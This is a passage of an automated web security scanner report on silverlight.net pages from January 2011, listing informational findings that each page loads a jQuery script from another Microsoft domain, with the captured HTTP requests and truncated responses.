GET /learn/pivotviewer/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26847
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
PivotViewe
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
</p>

<script src="http://www.microsoft.com/silverlight/scripts/Silverlight.js" type="text/javascript"></script>
...[SNIP]...

23.621. http://www.silverlight.net/learn/quickstarts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/quickstarts/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/quickstarts/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 45478
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Quickstart
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.622. http://www.silverlight.net/learn/tutorials/jesse-liberty/general-tutorials/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/tutorials/jesse-liberty/general-tutorials/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/tutorials/jesse-liberty/general-tutorials/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21647
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:38:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Jesse Libe
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.623. http://www.silverlight.net/learn/tutorials/silverlight-4/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/tutorials/silverlight-4/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/tutorials/silverlight-4/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26523
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Tutorials
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.624. http://www.silverlight.net/learn/tutorials/silverlight-4/advanced-silverlight-out-of-browser-introduction/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/tutorials/silverlight-4/advanced-silverlight-out-of-browser-introduction/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/tutorials/silverlight-4/advanced-silverlight-out-of-browser-introduction/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61155
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Tutorial :
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.625. http://www.silverlight.net/learn/tutorials/silverlight-4/aspnet-and-silverlight/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/tutorials/silverlight-4/aspnet-and-silverlight/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/tutorials/silverlight-4/aspnet-and-silverlight/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 56561
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Tutorial :
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.626. http://www.silverlight.net/learn/tutorials/silverlight-4/using-the-mvvm-pattern-in-silverlight-applications/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/tutorials/silverlight-4/using-the-mvvm-pattern-in-silverlight-applications/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/tutorials/silverlight-4/using-the-mvvm-pattern-in-silverlight-applications/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49515
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Tutorial :
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.627. http://www.silverlight.net/learn/tutorials/silverlight-4/using-wcf-ria-services/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/tutorials/silverlight-4/using-wcf-ria-services/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/tutorials/silverlight-4/using-wcf-ria-services/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51246
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Tutorial :
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.628. http://www.silverlight.net/learn/tutorials/windows-phone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/tutorials/windows-phone/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/tutorials/windows-phone/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15039
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Tutorials
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.629. http://www.silverlight.net/learn/videos/all/build-your-first-desktop-ria-application-with-silverlight/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/videos/all/build-your-first-desktop-ria-application-with-silverlight/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/videos/all/build-your-first-desktop-ria-application-with-silverlight/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30323
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:33:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Video : Bu
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.630. http://www.silverlight.net/learn/videos/all/build-your-first-silverlight-web-application/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/videos/all/build-your-first-silverlight-web-application/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/videos/all/build-your-first-silverlight-web-application/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30378
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:33:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Video : Bu
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.631. http://www.silverlight.net/learn/videos/expression/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/videos/expression/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/videos/expression/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 105930
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:35:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.632. http://www.silverlight.net/learn/videos/indonesian-videos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/videos/indonesian-videos/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/videos/indonesian-videos/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26451
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:36:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.633. http://www.silverlight.net/learn/videos/japanese-videos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/videos/japanese-videos/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/videos/japanese-videos/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40504
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:36:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.634. http://www.silverlight.net/learn/videos/lyndacom-silverlight-essential-training/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/videos/lyndacom-silverlight-essential-training/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/videos/lyndacom-silverlight-essential-training/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 108581
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:37:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.635. http://www.silverlight.net/learn/videos/silverlight-4-videos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/videos/silverlight-4-videos/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/videos/silverlight-4-videos/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68787
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.636. http://www.silverlight.net/learn/videos/silverlight-media-framework/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/videos/silverlight-media-framework/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/videos/silverlight-media-framework/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35058
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:34:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.637. http://www.silverlight.net/learn/videos/silverlight-videos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/learn/videos/silverlight-videos/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/videos/silverlight-videos/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 225515
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:34:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.638. http://www.silverlight.net/learn/videos/spanish-videos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
